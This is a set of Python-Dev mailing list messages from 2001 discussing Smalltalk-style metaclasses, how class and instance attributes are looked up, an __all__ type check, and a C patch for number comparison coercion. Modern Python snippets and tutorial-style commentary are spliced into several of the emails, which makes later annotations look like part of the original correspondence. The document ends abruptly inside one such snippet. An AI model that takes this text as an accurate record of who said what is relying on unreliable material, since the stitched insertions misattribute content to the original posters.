interesting, though, when you start to consider how the mechanism of
class.__class__ -- which is the thing that makes class methods no different
than instance methods -- actually works.  And this leads to metaclasses in
Smalltalk.

Here's a rough sketch of how metaclasses work:

Standard principles of Smalltalk:
o everything is an object (first-class)
o every object is an instance of a class
o a class inherits (single-inheritance) from its superclass (except the
root class Object, which has no superclass)
o methods can be invoked on an object.  All such methods are defined as part
of the object's class definition (or a class going up the superclass chain)

Because of the first 2 principles above:
o every class is an object (because everything is an object)
o every class is, itself, an instance of some class (because every object
is an instance of a class)

Originally in Smalltalk-76,  there was one metaclass, Class. All classes
(class objects) were instances of Class.  Class was an instance of itself.
Class had methods defined for it just like all classes did.  In particular,
it had a method "new" -- this being the method that creates instances of
classes.  So suppose you had class Rectangle.  Rectangle is an instance of
Class (hence it is a class object).  If you wanted to create an instance of
Rectangle, you would do: myRect = Rectangle.new().   This would mean: "find
the 'new' method in the definition of Rectangle's class (Class) and invoke
it on Rectangle (which is a class object)."  The result is a Rectangle
instance which is assigned to the variable myRect.  The Rectangle class
object held data (state -- same rules as any other kind of object) -- such
as number and name of fields its instances would have, a dictionary of
methods for its instances, etc.  So the "new" method in Class would have
access to all the info it needed to create a Rectangle instance (as opposed
to a Point instance, for example).

The limitation with this scheme was that all classes had to share exactly
the same methods, namely all the methods defined in Class.  The method
"new" was one of these methods along with lots of  "reflection-type"
methods for class creation, modification, and inspection.  But if you
wanted an "application-oriented" class method -- like Date.currentDate() --
you couldn't do that because then the method "currentDate" would be shared
amongst all class objects (instances of Class) and wouldn't make any sense
(e.g., Rectangle.currentDate()).

In Smalltalk-80 I added a more flexible mechanism which we called
metaclasses (we hadn't used that terminology previously for the single
Class although it was a "metaclass").  The thing that everyone in the
Smalltalk development team liked about the new metaclass mechanism at the
time was that it didn't require any new basic principles for Smalltalk.  It
was all done using the same basic principles of Smalltalk listed above.
The idea was to use subclassing to allow for different methods for
different instances of Class.  A "metaclass" simply became a subclass of
Class.  Each class object then ended up being a singleton instance
(although the "singleton-ness" was not mandatory) of a metaclass (i.e., a
subclass of Class).  So class objects were no longer _all_ instances of the
_same_ class (Class).  Each was an instance of a corresponding subclass of
Class -- that is to say, an instance of a metaclass.

The Smalltalk-80 class hierarchy looked like the following:
(This is actually a simplification.  The actual hierarchy has a little
more factoring and I changed the names for more clarity).

First a digression on some terminology:
o a class is an object that can be instantiated
o a metaclass is a class and one such that when it is instantiated, the
instance is itself a class
o a plain-object is one that cannot be instantiated  (I'm just making this
term up).
o a plain-class is one that is a class but is not a metaclass  (making this
up, too).

In the list below, indentation indicates class hierarchy (superclass --
subclass)

plain-class                                     metaclass
-----------                                     ---------
<none>                                          o Class
o Object                        isInstanceOf      o ObjectMetaClass                    isInstanceOf  MetaClass
    o Class                     isInstanceOf        o ClassMetaClass                   isInstanceOf  MetaClass
        o MetaClass             isInstanceOf          o MetaClassMetaClass             isInstanceOf  MetaClass
    . . .                                           . . .
    o Rectangle                 isInstanceOf        o RectangleMetaClass               isInstanceOf  MetaClass
        o SpecializedRectangle  isInstanceOf          o SpecializedRectangleMetaClass  isInstanceOf  MetaClass

All "metaclasses" are instances of MetaClass.  All "plain-classes" (those
that are not "metaclasses") are instances of a "metaclass".  Because of
this there are parallel class hierarchies between "plain-classes" and their
corresponding "metaclasses".  Note that MetaClass is a "plain-class" and
not a "metaclass".  Also note that MetaClass (being a "plain-class") is an
instance of its corresponding "metaclass" MetaClassMetaClass.  And
MetaClassMetaClass is an instance of MetaClass (because MetaClassMetaClass
_is_ a "metaclass").  The MetaClass / MetaClassMetaClass class/instance
relationship is circular.

An example.   If you want a Rectangle class you first make a metaclass for
it, RectangleMetaClass  -- actually, the system does this for you
automatically as part of the class creation method implementation (when you
define the class Rectangle, for example).  RectangleMetaClass is an
instance of MetaClass so all the methods defined in MetaClass are available
to it.  RectangleMetaClass can also define its own methods now  (because it
is a class) which would be invoked on any (typically one) instance of
RectangleMetaClass, which in this case is going to be class Rectangle.  You
then make your Rectangle class by making an instance of RectangleMetaClass
(conceptually doing:  Rectangle = RectangleMetaClass.new()  ).   Now you
can make instances of Rectangle, doing:  myRect = Rectangle.new() as
before.  This is not so different from the Smalltalk-76 mechanism.  The
main advantage is that you now have a specific class, RectangleMetaClass,
that can have methods specific to the class Rectangle (the instance of
RectangleMetaClass).  So you could define a method like
"newFromPointToPoint" for example and then do:  myRect =
Rectangle.newFromPointToPoint(point1,point2).  The meaning is the same as
always: take the variable "Rectangle", find out what it is pointing to.  It
is pointing to an instance of the RectangleMetaClass.  Find the method
"newFromPointToPoint" as part of the definition of RectangleMetaClass (it
being a class object).  Invoke this method on the Rectangle class object --
which then creates a Rectangle instance.  The same would go for the other
example: Date.currentDate().
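Python can express the same arrangement directly with a metaclass. In this sketch the names are illustrative, and Python's snake_case replaces the Smalltalk example's currentDate/followingDate. `current_date` lives on the metaclass, so the ordinary lookup rule finds it on the class object. `following_date` lives on the class and is found on instances. One difference from Smalltalk-80: Python does not generate a metaclass per class automatically, so a subclass of Date simply shares DateMeta.

```python
import datetime

class DateMeta(type):
    """Plays the role of Smalltalk-80's per-class metaclass for Date."""

    def current_date(cls):
        # Looked up on type(Date), i.e. DateMeta, exactly as an instance
        # method is looked up on type(d).
        return cls(datetime.date.today().toordinal())

class Date(metaclass=DateMeta):
    def __init__(self, ordinal):
        self.ordinal = ordinal

    def following_date(self):
        # An ordinary instance method, found on type(d), i.e. Date.
        return type(self)(self.ordinal + 1)

class SpecialDate(Date):
    pass  # inherits DateMeta; no SpecialDateMetaClass is generated

d = Date.current_date()
tomorrow = d.following_date()
```

Note that `d.current_date` does not exist. Instance lookup searches `type(d)` and its bases, never the metaclass, which is the same separation Jim describes.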

So the bottom line is (I think) that the Smalltalk method lookup mechanism
doesn't have to resolve an ambiguity because all methods that get invoked
on an object always come from the object's definition class (or superclass)
and from no other place.

Hope this helps,

Jim


From guido at digicool.com  Wed May  2 03:29:28 2001
From: guido at digicool.com (Guido van Rossum)
Date: Tue, 01 May 2001 20:29:28 -0500
Subject: [Python-Dev] Coercion and comparison of numbers
In-Reply-To: Your message of "Tue, 01 May 2001 23:22:11 +0200."
             <3AEF2903.79308F55@lemburg.com> 
References: <3AEF2903.79308F55@lemburg.com> 
Message-ID: <200105020129.UAA24690@cj20424-a.reston1.va.home.com>

> I just received a bug report for mx.Number which revealed a
> probelm with the comparison code in Python 2.1. Looking at
> the code it seems that one of my original coercion patches
> did not make it into the core. I added a new API PyNumber_Compare()
> knows about the new coercion mechanism and should be called for
> numbers instead of trying coercion in PyObject_Compare().
> 
> Was this part of the coercion patch left out on purpose or
> a simple oversight ? I hope the latter... 

Hard to say.  I don't think I paid very close attention to your patch;
Neil did, but I changed a lot of the code around coercions and
comparisons in order to implement rich comparisons.  So, several
things may have happened: Neil lost it; Neil decided against it; or I
ripped it out.

Can you elucidate me regarding the issues?  (If there's code, please
quote it or link to a specific patch.)  Since the concept of "number"
is ill-defined at best, when exactly should PyNumber_Compare() be
called?  What is it supposed to do?  Does it need a rich cousin?

--Guido van Rossum (home page: http://www.python.org/~guido/)


From nas at python.ca  Wed May  2 02:42:15 2001
From: nas at python.ca (Neil Schemenauer)
Date: Tue, 1 May 2001 17:42:15 -0700
Subject: [Python-Dev] Coercion and comparison of numbers
In-Reply-To: <200105020129.UAA24690@cj20424-a.reston1.va.home.com>; from guido@digicool.com on Tue, May 01, 2001 at 08:29:28PM -0500
References: <3AEF2903.79308F55@lemburg.com> <200105020129.UAA24690@cj20424-a.reston1.va.home.com>
Message-ID: <20010501174215.A9565@glacier.fnational.com>

[MAL]
> I just received a bug report for mx.Number which revealed a
> problem with the comparison code in Python 2.1. Looking at
> the code it seems that one of my original coercion patches
> did not make it into the core. I added a new API PyNumber_Compare()
> which knows about the new coercion mechanism and should be called for
> numbers instead of trying coercion in PyObject_Compare().

I remember the API.  I don't remember what happened to it.  Guido
might have dropped it or I might have taken it out thinking the
comparison issues would be sorted out by Guido.

Why is a new API needed?  Why can't PyObject_Compare() do the
right thing (ie. not coerce new style numbers)?

  Neil


From guido at digicool.com  Wed May  2 03:55:59 2001
From: guido at digicool.com (Guido van Rossum)
Date: Tue, 01 May 2001 20:55:59 -0500
Subject: [Python-Dev] Slight wart in __all__
In-Reply-To: Your message of "Sun, 29 Apr 2001 12:14:43 +1000."
             <LCEPIIGDJPKCOIHOBJEPKEBEDLAA.MarkH@ActiveState.com> 
References: <LCEPIIGDJPKCOIHOBJEPKEBEDLAA.MarkH@ActiveState.com> 
Message-ID: <200105020155.UAA25687@cj20424-a.reston1.va.home.com>

> Would it make sense to explicitly raise a more meaningful exception here
> if __all__ doesn't contain strings?

Definitely.  Be my guest.
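A minimal sketch of such a check, written in Python for readability. `check_all()` is a hypothetical helper, not the interpreter's import code (which lives in C); it only shows the intended behaviour: name the module and the offending item instead of failing obscurely later.

```python
import types

def check_all(module):
    """Hypothetical helper: raise TypeError if module.__all__ holds non-strings."""
    names = getattr(module, "__all__", None)
    if names is None:
        return  # no __all__, nothing to validate
    for item in names:
        if not isinstance(item, str):
            raise TypeError(
                "%s.__all__ must contain only strings, found %r (%s)"
                % (module.__name__, item, type(item).__name__)
            )

mod = types.ModuleType("example")
mod.__all__ = ["spam", 42]
try:
    check_all(mod)
except TypeError as exc:
    print(exc)  # example.__all__ must contain only strings, found 42 (int)
```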

--Guido van Rossum (home page: http://www.python.org/~guido/)


From greg at cosc.canterbury.ac.nz  Wed May  2 03:22:47 2001
From: greg at cosc.canterbury.ac.nz (Greg Ewing)
Date: Wed, 02 May 2001 13:22:47 +1200 (NZST)
Subject: [Python-Dev] Classes and Metaclasses in Smalltalk
In-Reply-To: <200105020052.TAA24315@cj20424-a.reston1.va.home.com>
Message-ID: <200105020122.NAA15982@s454.cosc.canterbury.ac.nz>

Guido:

> If both are defined, I propose the following, clumsy but backwards
> compatible rule: if DictType.__dict__['foo'] describes a method, it
> wins.  Otherwise, TypeType.__dict__['foo'] wins.

Yeek! I think that's far too confusing a rule. I suppose
it might do in the meantime, but we'd better have a long
term solution in mind before going too far down this
route.

Ultimately it seems like we'll have to introduce a separate
namespace for methods and default instance attributes,
say __classdict__. Then lookup of x.foo would look
first in x.__dict__, then x.__class__.__classdict__,
etc. up the inheritance chain.
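A minimal sketch of that lookup order, assuming each class's ordinary `__dict__` stands in for the proposed `__classdict__`. The `lookup()` function and the example classes are hypothetical; the sketch deliberately ignores descriptors that should override the instance dict.

```python
def lookup(x, name):
    """Hypothetical lookup: x.__dict__ first, then each class namespace
    along the inheritance chain (class __dict__ stands in for __classdict__)."""
    inst_dict = getattr(x, "__dict__", {})
    if name in inst_dict:
        return inst_dict[name]
    for klass in type(x).__mro__:
        if name in klass.__dict__:
            attr = klass.__dict__[name]
            # Bind functions to the instance, as ordinary method lookup does.
            if hasattr(attr, "__get__"):
                return attr.__get__(x, type(x))
            return attr
    raise AttributeError(name)


class Base:
    color = "red"  # class attribute used as a default instance attribute

    def describe(self):
        return "a %s thing" % self.color

class Derived(Base):
    pass

d = Derived()
print(lookup(d, "color"))        # red  (found in Base's namespace)
d.color = "blue"
print(lookup(d, "color"))        # blue (the instance dict is searched first)
print(lookup(d, "describe")())   # a blue thing
```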

Then we'll have to resolve the ambiguity of the class.foo
syntax. The bravest way would be simply to change the syntax
for getting unbound methods.

The most common use for these seems to be for calling
inherited methods, so perhaps something like

   inherited MyBaseClass.foo(arg, ...)

which would be equivalent to

   getmethod(MyBaseClass, 'foo')(self, arg, ...)

where getmethod() is a new builtin like getattr()
except that it looks in the __classdict__, and 'self'
is really whatever the first argument of the containing
method was.
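A sketch of the proposed `getmethod()` builtin, again letting each class's `__dict__` stand in for `__classdict__`. The function, the metaclass and the classes are all hypothetical. The point of the example is that `getmethod()` never looks at the metaclass, so a metaclass attribute cannot be mistaken for a method of the class's instances.

```python
def getmethod(cls, name):
    """Hypothetical builtin: search only the class-level namespaces of cls
    and its bases (never the metaclass) and return the raw function."""
    for klass in cls.__mro__:
        if name in klass.__dict__:
            return klass.__dict__[name]
    raise AttributeError("%s has no method %r" % (cls.__name__, name))


class Meta(type):
    def describe(cls):  # an attribute of the class object, not of instances
        return "metaclass describe of %s" % cls.__name__

class MyBaseClass(metaclass=Meta):
    def foo(self, arg):
        return "base foo(%r)" % (arg,)

class Child(MyBaseClass):
    def foo(self, arg):
        # Spelled-out form of the proposed: inherited MyBaseClass.foo(arg)
        return "child -> " + getmethod(MyBaseClass, "foo")(self, arg)

print(Child().foo(1))          # child -> base foo(1)
print(MyBaseClass.describe())  # ordinary attribute access reaches the metaclass
```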

Now that we have __future__, would such a change be
contemplatable? Or is it too radical to even think
about?

Greg Ewing, Computer Science Dept, +--------------------------------------+
University of Canterbury,	   | A citizen of NewZealandCorp, a	  |
Christchurch, New Zealand	   | wholly-owned subsidiary of USA Inc.  |
greg at cosc.canterbury.ac.nz	   +--------------------------------------+


From guido at digicool.com  Wed May  2 04:48:43 2001
From: guido at digicool.com (Guido van Rossum)
Date: Tue, 01 May 2001 21:48:43 -0500
Subject: [Python-Dev] Classes and Metaclasses in Smalltalk
In-Reply-To: Your message of "Wed, 02 May 2001 13:22:47 +1200."
             <200105020122.NAA15982@s454.cosc.canterbury.ac.nz> 
References: <200105020122.NAA15982@s454.cosc.canterbury.ac.nz> 
Message-ID: <200105020248.VAA30315@cj20424-a.reston1.va.home.com>

> Guido:
> 
> > If both are defined, I propose the following, clumsy but backwards
> > compatible rule: if DictType.__dict__['foo'] describes a method, it
> > wins.  Otherwise, TypeType.__dict__['foo'] wins.

Greg Ewing:

> Yeek! I think that's far too confusing a rule. I suppose
> it might do in the meantime, but we'd better have a long
> term solution in mind before going too far down this
> route.

I agree 100%.  I had to do something quick to be able to make progress
with my PEP 252 project, but it's a clear indication that there's a
problem!

> Ultimately it seems like we'll have to introduce a separate
> namespace for methods and default instance attributes,
> say __classdict__. Then lookup of x.foo would look
> first in x.__dict__, then x.__class__.__classdict__,
> etc. up the inheritance chain.

Except that sometimes you really do want x.__class__.__classdict__ to
have priority (e.g. for "guarded" attributes).
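One possible reading of "guarded" attributes (an interpretation; the thread does not define the term) is an attribute the class controls even when the instance dict has an entry of the same name. In modern Python a property behaves this way, because it is a data descriptor and data descriptors on the class win over the instance `__dict__`. The `Account` class is made up for illustration.

```python
class Account:
    def __init__(self):
        self._entries = [10, 5]

    @property
    def balance(self):
        # Computed from state the class controls; no setter is defined.
        return sum(self._entries)

acct = Account()
acct.__dict__["balance"] = 1_000_000  # try to shadow it via the instance dict
print(acct.balance)                   # 15: the class-level property still wins
try:
    acct.balance = 3                  # no setter, so assignment is refused
except AttributeError:
    print("balance is read-only")
```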

> Then we'll have to resolve the ambiguity of the class.foo
> syntax. The bravest way would be simply to change the syntax
> for getting unbound methods.

Agreed again.

> The most common use for these seems to be for calling
> inherited methods, so perhaps something like
> 
>    inherited MyBaseClass.foo(arg, ...)
> 
> which would be equivalent to
> 
>    getmethod(MyBaseClass, 'foo')(self, arg, ...)
> 
> where getmethod() is a new builtin like getattr()
> except that it looks in the __classdict__, and 'self'
> is really whatever the first argument of the containing
> method was.

The second most common use is to reference class variables
(e.g. imagine a class that keeps counters of how many instances have
been created and deleted in C.initcount and C.delcount).  But these
should not have to change, since they really are class attributes.
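A sketch of that idiom; the counter names come from the example above and the class is otherwise made up. The counters live on the class and are reached through it, so a change to instance lookup would not affect them. The expected output assumes CPython's reference counting.

```python
import gc

class C:
    initcount = 0   # class attributes: one counter shared by all instances
    delcount = 0

    def __init__(self):
        # Rebind through the class; `self.initcount += 1` would instead
        # create a per-instance attribute and leave C.initcount alone.
        C.initcount += 1

    def __del__(self):
        C.delcount += 1

a, b = C(), C()
del a
gc.collect()   # CPython ran __del__ at `del a`; other implementations may need this
print(C.initcount, C.delcount)   # 2 1
```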

> Now that we have __future__, would such a change be contemplatable?
> Or is it too radical to even think about?

If we can find a way to spell "super.method", we should be ready for
the future.  I can't think of something right off the bat
unfortunately.

But the issue of backwards compatibility is a big one here: the idioms
for calling base class methods and using class variables as defaults
for instance variables are so common that we will have to support
these for many future versions!  (Two things I am not looking forward
to: fixing all the Zope code that uses this, and telling the author of
Programming Python, 2nd ed.)

--Guido van Rossum (home page: http://www.python.org/~guido/)


From greg at cosc.canterbury.ac.nz  Wed May  2 04:48:20 2001
From: greg at cosc.canterbury.ac.nz (Greg Ewing)
Date: Wed, 02 May 2001 14:48:20 +1200 (NZST)
Subject: [Python-Dev] Classes and Metaclasses in Smalltalk
In-Reply-To: <200105020248.VAA30315@cj20424-a.reston1.va.home.com>
Message-ID: <200105020248.OAA16329@s454.cosc.canterbury.ac.nz>

Guido:

> Except that sometimes you really do want x.__class__.__classdict__ to
> have priority (e.g. for "guarded" attributes).

What's a "guarded" attribute?

> But the issue of backwards compatibility is a big one here

I was thinking that, while this is still in the __future__,
the __dict__ attribute would be a pseudo-dict that, by
default, behaves like the union of the old __dict__ and
the __classdict__.
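Such a pseudo-dict can be approximated with `collections.ChainMap`. This is a sketch under the assumption that class namespaces play the role of `__classdict__`. Reads search the instance dict and then each class namespace along the MRO. Writes go only to the first mapping, so instance assignments never touch the class-level defaults. The classes are made up for illustration.

```python
from collections import ChainMap

class Shape:
    x = 0          # class attributes doubling as instance defaults
    y = 0

class Point(Shape):
    def norm2(self):
        return self.x ** 2 + self.y ** 2

p = Point()
p.x = 3

# Hypothetical pseudo-dict: the union of p.__dict__ and the class namespaces.
view = ChainMap(p.__dict__, *(k.__dict__ for k in type(p).__mro__))

print(view["x"], view["y"])   # 3 0
view["y"] = 4                 # stored in p.__dict__; Shape.y is untouched
print(p.norm2(), Shape.y)     # 25 0
```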

Greg Ewing, Computer Science Dept, +--------------------------------------+
University of Canterbury,	   | A citizen of NewZealandCorp, a	  |
Christchurch, New Zealand	   | wholly-owned subsidiary of USA Inc.  |
greg at cosc.canterbury.ac.nz	   +--------------------------------------+


From mal at lemburg.com  Wed May  2 09:59:03 2001
From: mal at lemburg.com (M.-A. Lemburg)
Date: Wed, 02 May 2001 09:59:03 +0200
Subject: [Python-Dev] Coercion and comparison of numbers
References: <3AEF2903.79308F55@lemburg.com> <200105020129.UAA24690@cj20424-a.reston1.va.home.com> <20010501174215.A9565@glacier.fnational.com>
Message-ID: <3AEFBE47.A847C5D2@lemburg.com>

Neil Schemenauer wrote:
> 
> [MAL]
> > I just received a bug report for mx.Number which revealed a
> > problem with the comparison code in Python 2.1. Looking at
> > the code it seems that one of my original coercion patches
> > did not make it into the core. I added a new API PyNumber_Compare()
> > which knows about the new coercion mechanism and should be called for
> > numbers instead of trying coercion in PyObject_Compare().
> 
> I remember the API.  I don't remember what happened to it.  Guido
> might have dropped it or I might have taken it out thinking the
> comparison issues would be sorted out by Guido.

Good; so there's a chance for getting it back in :-)
 
> Why is a new API needed?  Why can't PyObject_Compare() do the
> right thing (ie. not coerce new style numbers)?

I think the reason for implementing number compares as a separate
API was simply to move code out of PyObject_Compare() into
a new function, not so much motivated by some higher-level need
to do number compares.

[Guido]
> > Was this part of the coercion patch left out on purpose or
> > a simple oversight ? I hope the latter... 
> 
> Hard to say.  I don't think I paid very close attention to your patch;
> Neil did, but I changed a lot of the code around coercions and
> comparisons in order to implement rich comparisons.  So, several
> things may have happened: Neil lost it; Neil decided against it; or I
> ripped it out.
> 
> Can you enlighten me regarding the issues?  (If there's code, please
> quote it or link to a specific patch.)  Since the concept of "number"
> is ill-defined at best, when exactly should PyNumber_Compare() be
> called?  What is it supposed to do?  Does it need a rich cousin?

The reasoning is simple: the coercion patches basically pass
control over coercion down to the APIs in question and thus provide
the type with more information to choose from.

This is currently implemented in 2.1 for all number methods,
but not for number comparisons which do have the same problems
with centralized coercion as e.g. __add__ or other binary
operators.
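A rough Python model of the idea, not the patch's C code: instead of coercing both operands to a common type up front, each operand's type gets a chance to perform the comparison itself, and comparing type names is the last resort (as in `_PyNumber_OldstyleCompare`). `number_compare` and `Money` are hypothetical. `__cmp__` is treated as an ordinary method here, and, as a simplification, the right operand's `__cmp__` result is negated instead of calling a separate `__rcmp__`.

```python
def _sign(c):
    return (c > 0) - (c < 0)

def number_compare(v, w):
    """Return -1, 0 or 1, letting each operand's type decide first."""
    # 1. The left operand's type tries first.
    meth = getattr(type(v), "__cmp__", None)
    if meth is not None:
        res = meth(v, w)
        if res is not NotImplemented:
            return _sign(res)
    # 2. Then the right operand's type, with the result negated.
    meth = getattr(type(w), "__cmp__", None)
    if meth is not None:
        res = meth(w, v)
        if res is not NotImplemented:
            return -_sign(res)
    # 3. Last resort, as in the patch: compare the type names.
    a, b = type(v).__name__, type(w).__name__
    return (a > b) - (a < b)


class Money:
    """Toy number type that knows how to compare itself with ints."""
    def __init__(self, cents):
        self.cents = cents

    def __cmp__(self, other):
        if isinstance(other, Money):
            other = other.cents
        elif isinstance(other, int):
            other = other * 100   # ints count whole units
        else:
            return NotImplemented
        return self.cents - other

print(number_compare(Money(250), 2))   # 1
print(number_compare(2, Money(250)))   # -1: int has no __cmp__, Money decides
```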

Here's part of the original patch:

--- Include/orig/abstract.h	Wed May 13 00:28:58 1998
+++ Include/abstract.h	Thu May 21 12:31:55 1998
@@ -447,11 +447,18 @@ xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
 
 	 This function always succeeds.
 
        */
 
-     PyObject *PyNumber_Add Py_PROTO((PyObject *o1, PyObject *o2));
+     PyObject *PyNumber_Compare Py_PROTO((PyObject *o1, PyObject *o2));
+
+       /*
+	 Returns the result of comparing o1 and o2, or null on failure.
+	 This is the equivalent of the Python expression: cmp(o1,o2).
+       */
+
+      PyObject *PyNumber_Add Py_PROTO((PyObject *o1, PyObject *o2));
 
        /*
 	 Returns the result of adding o1 and o2, or null on failure.
 	 This is the equivalent of the Python expression: o1+o2.
 
[...]

 }
 
+/* Emulate old method for comparing numeric types using coercion and
+   tp_compare. If coercion doesn't work, we use the type names as
+   comparison basis (like PyObject_Compare() does too). */
+
+static PyObject *
+_PyNumber_OldstyleCompare(PyObject *v, 
+			  PyObject *w)
+{
+    int err;
+
+    DPRINTF("_PyNumber_OldstyleCompare(%s at 0x%lx, %s at 0x%lx);\n",
+	    v->ob_type->tp_name,(long)v,
+	    w->ob_type->tp_name,(long)w);
+    err = PyNumber_CoerceEx(&v, &w);
+    if (err < 0)
+	    return NULL;
+    else if (err == 0 && v->ob_type->tp_compare) {
+	    int cmp;
+	    
+	    cmp = (*v->ob_type->tp_compare)(v, w);
+	    /* XXX Test for errors ? Looks like C types cannot raise
+	       exceptions in the compare slot... */
+	    Py_DECREF(v);
+	    Py_DECREF(w);
+	    DPRINTF(" compare slot returned: %i",cmp);
+	    return PyInt_FromLong(cmp);
+    }
+    DPRINTF(" using type names for comparison\n");
+    return PyInt_FromLong(strcmp(v->ob_type->tp_name, 
+				 w->ob_type->tp_name));
+}
+
+PyObject *
+PyNumber_Compare(v, w)
+	PyObject *v, *w;
+{
+	DPRINTF("PyNumber_Compare(%s at 0x%lx, %s at 0x%lx);\n",
+		v->ob_type->tp_name,(long)v,
+		w->ob_type->tp_name,(long)w);
+	BINOP("__cmp__", "__rcmp__", PyNumber_Compare);
+	return _PyNumber_BinaryOperation(v,w,
+					 NB_SLOT(nb_cmp),
+					 "cmp()");
+}
+

[...]

+static PyObject *
+_PyNumber_BinaryOperation(PyObject *v,
+			  PyObject *w,
+			  const int op_slot,
+			  const char *operation)
+{
+	PyNumberMethods *mv, *mw;
+	register PyObject *x;
+	register binaryfunc *slot;
+	int c;
...
+	/* When using old coercion, make sure that the requested slot
+	   is available on old style numbers or use an emulation. */
+	if (op_slot > NB_SLOT(nb_hex)) {
+
+	    /* Emulation hooks: */
+	    if (op_slot == NB_SLOT(nb_cmp))
+		return _PyNumber_OldstyleCompare(v,w);
+
+	    goto badOperands;
+	}


[...]

 int
 PyObject_Compare(v, w)
 	PyObject *v, *w;
 {
 	PyTypeObject *tp;
@@ -291,27 +294,30 @@ PyObject_Compare(v, w)
 			Py_DECREF(res);
 			PyErr_SetString(PyExc_TypeError,
 					"comparison did not return an int");
 			return -1;
 		}
-		c = PyInt_AsLong(res);
+		c = PyInt_AS_LONG(res);
 		Py_DECREF(res);
 		return (c < 0) ? -1 : (c > 0) ? 1 : 0;	
 	}
 	if ((tp = v->ob_type) != w->ob_type) {
-		if (tp->tp_as_number != NULL &&
-				w->ob_type->tp_as_number != NULL) {
-			int err;
-			err = PyNumber_CoerceEx(&v, &w);
-			if (err < 0)
+		if (tp->tp_as_number != NULL ||
+		    w->ob_type->tp_as_number != NULL) {
+			PyObject *res;
+			int c;
+			res = PyNumber_Compare(v,w);
+			if (res == NULL)
 				return -1;
-			else if (err == 0) {
-				int cmp = (*v->ob_type->tp_compare)(v, w);
-				Py_DECREF(v);
-				Py_DECREF(w);
-				return cmp;
+			if (!PyInt_Check(res)) {
+			    PyErr_SetString(PyExc_TypeError,
+					"comparison did not return an int");
+			    return -1;
 			}
+			c = PyInt_AS_LONG(res);
+			Py_DECREF(res);
+			return (c < 0) ? -1 : (c > 0) ? 1 : 0;	
 		}
 		return strcmp(tp->tp_name, w->ob_type->tp_name);
 	}
 	if (tp->tp_compare == NULL)
 		return (v < w) ? -1 : 1;


-- 
Marc-Andre Lemburg
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From mal at lemburg.com  Wed May  2 11:09:17 2001
From: mal at lemburg.com (M.-A. Lemburg)
Date: Wed, 02 May 2001 11:09:17 +0200
Subject: [Python-Dev] Classes and Metaclasses in Smalltalk
References: <200105020052.TAA24315@cj20424-a.reston1.va.home.com>
Message-ID: <3AEFCEBD.2E5979C9@lemburg.com>

Guido van Rossum wrote:
> 
> While implementing more class-like behavior for built-in types in the
> experimental descr-branch in the 2.2 CVS tree, I've noticed problems
> caused by Python's collapsing of class attributes and instance
> attributes.
> 
> For example, suppose d is a dictionary.  My experimental changes make
> d.__class__ return DictType (from the types module).
> (DictType.__class__ is TypeType, by the way.)  I also added special
> methods.  For example, d.__repr__() now returns repr(d).  I am
> preparing for subclassing of built-in types, so I will eventually be
> able to derive a class MyDictType from DictType, as follows:
> 
> class MyDictType(DictType):
>   ...
> 
> Now comes the fun part.  Suppose MyDictType wants to define its own
> repr():
> 
> class MyDictType(DictType):
>   def __repr__(self):
>     return "MyDictType(%s)" % DictType.__repr__(self)
> 
> But, (surprise, surprise!), DictType itself also has a __repr__()
> method: it returns the string "<type 'dictionary'>".
> 
> So the above code would fail: DictType.__repr__() returns
> repr(DictType), and DictType.__repr__(self) raises an argument count
> error.  The correct __repr__ method for dictionary objects can be
> found as DictType.__dict__['__repr__'], but that looks hideous!
> 
> What to do?  Pragmatically, I can make DictType.__repr__ return
> DictType.__dict__['__repr__'], and all will be well in this example.
> But we have to tread carefully here: DictType.__class__ is TypeType,
> but DictType.__dict__['__class__'] is a descriptor for the __class__
> attribute on dictionary objects.
> 
> The best rule I can think of so far is that DictType.__dict__ gives
> the *true* set of attribute descriptors for dictionary objects, and is
> thus similar to Smalltalk's class.methodDict that Jim describes
> below.  DictType.foo is a shortcut that can resolve to either
> DictType.__dict__['foo'] or to an attribute (maybe a method) of
> DictType described in TypeType.__dict__['foo'], whichever is defined.
> If both are defined, I propose the following, clumsy but backwards
> compatible rule: if DictType.__dict__['foo'] describes a method, it
> wins.  Otherwise, TypeType.__dict__['foo'] wins.

I'm not sure I can follow you here: DictType.__repr__ is the
representation method of the dictionary and not inherited
from TypeType, so there should be no problem.

The problem with the misleading error message would only show
up in case DictType does not define a __repr__ method. Then the
inherited one from TypeType would come into play and cause
the problem you mention above.
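For what it's worth, this is how the example plays out in current CPython 3, where the type is spelled `dict` rather than `DictType`: `dict.__repr__` resolves to the dictionary's own slot wrapper rather than to `type.__repr__`, so the subclass code from the quoted message works as written. The output strings below are CPython 3's.

```python
class MyDictType(dict):
    def __repr__(self):
        # dict.__repr__ is the dictionary's own __repr__, not type.__repr__
        # (which is what produces "<class 'dict'>").
        return "MyDictType(%s)" % dict.__repr__(self)

d = MyDictType(a=1)
print(repr(d))     # MyDictType({'a': 1})
print(repr(dict))  # <class 'dict'>
print(dict.__dict__["__repr__"] is dict.__repr__)  # True
```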

Thinking in terms of meta-classes, I believe we should implement
this mechanism in the meta-class (TypeType in this case). Its
__getattr__() will have to decide whether to expose its
own methods and attributes.

The only catch here is that currently instances and classes have 
control of whether and how to bind found functions as methods or not. 
We should probably change that to pass complete control over to the 
meta-class object and remove the special control flows currently found
in instance_getattr2() and class_lookup().

In general, I think that meta-classes should not expose their
attributes to the class objects they create, since this causes
way too many problems.

Perhaps I'm oversimplifying things here, but I have a feeling that
we can go a long way by actually trying to see meta-classes as 
first class members in the interpreter design and moving all the 
binding and lookup mechanisms over to this object type. The special 
casing should then take place in the meta-class rather than its 
creations.
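A minimal sketch of a metaclass that takes over class-level lookup and keeps its own methods from leaking into the classes it creates. `NoLeakMeta` is hypothetical and written against modern Python, where a metaclass can override `__getattribute__`. Dunder names are left to the normal machinery because things like `__dict__` and `__name__` are supplied by the metaclass.

```python
class NoLeakMeta(type):
    """Hypothetical metaclass: C.name is looked up only along C.__mro__."""

    def __getattribute__(cls, name):
        # Let dunders (__dict__, __name__, __mro__, ...) use the normal path.
        if name.startswith("__") and name.endswith("__"):
            return type.__getattribute__(cls, name)
        for klass in type.__getattribute__(cls, "__mro__"):
            namespace = type.__getattribute__(klass, "__dict__")
            if name in namespace:
                attr = namespace[name]
                # Bind the way ordinary class attribute access would.
                if hasattr(attr, "__get__"):
                    return attr.__get__(None, cls)
                return attr
        # Deliberately no fallback to the metaclass's own attributes.
        raise AttributeError(name)

    def describe(cls):
        return "class %s" % cls.__name__


class C(metaclass=NoLeakMeta):
    def greet(self):
        return "hello"

print(C().greet())             # hello
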